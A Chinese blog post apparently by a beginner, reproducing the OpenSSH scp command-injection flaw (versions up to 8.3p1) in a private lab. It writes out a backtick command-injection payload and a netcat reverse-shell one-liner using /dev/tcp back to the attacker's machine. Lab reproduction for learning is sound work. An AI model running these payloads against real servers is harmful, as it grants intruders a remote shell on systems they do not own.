最近看好多大佬都在复现这个OpenSSH命令注入漏洞,作为菜鸡的我也要跟随大佬的脚步,也来复现一波(不分析漏洞原理,本人是菜鸡,能力不足)。再写这篇博客很不幸的我(电脑蹦了重启,写好的都没保存),不放弃继续重新来一遍。
介绍
2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。
漏洞影响版本
OpenSSH =< 8.3p1
漏洞复现要求
OpenSSH =< 8.3p1
需要知道ssh密码
搭建环境
centOS 7 IP:192.168.110.153
kali2019.4 IP:192.168.110.134
介绍一下scp命令:
下面开始行动:
关闭防火墙,(我没有关闭,在这里我也就不关闭了。)
查看ssh版本吧
ssh -V
首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。
scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'
成功将kali上面的文件传入道centOS上面,和自己创建了文件。
直接进行nc反弹获取shell
先监听一个端口
nc -lvvp 7777
进行反弹shell
scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'
总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。
改正:
我在总结说知道ssh密码却不给登录,这个我今天复现尝试了,禁止远程登录这个命令是不行的,应该是需要做别的策略,还在继续探索中,主要修改一下自己错误的地方。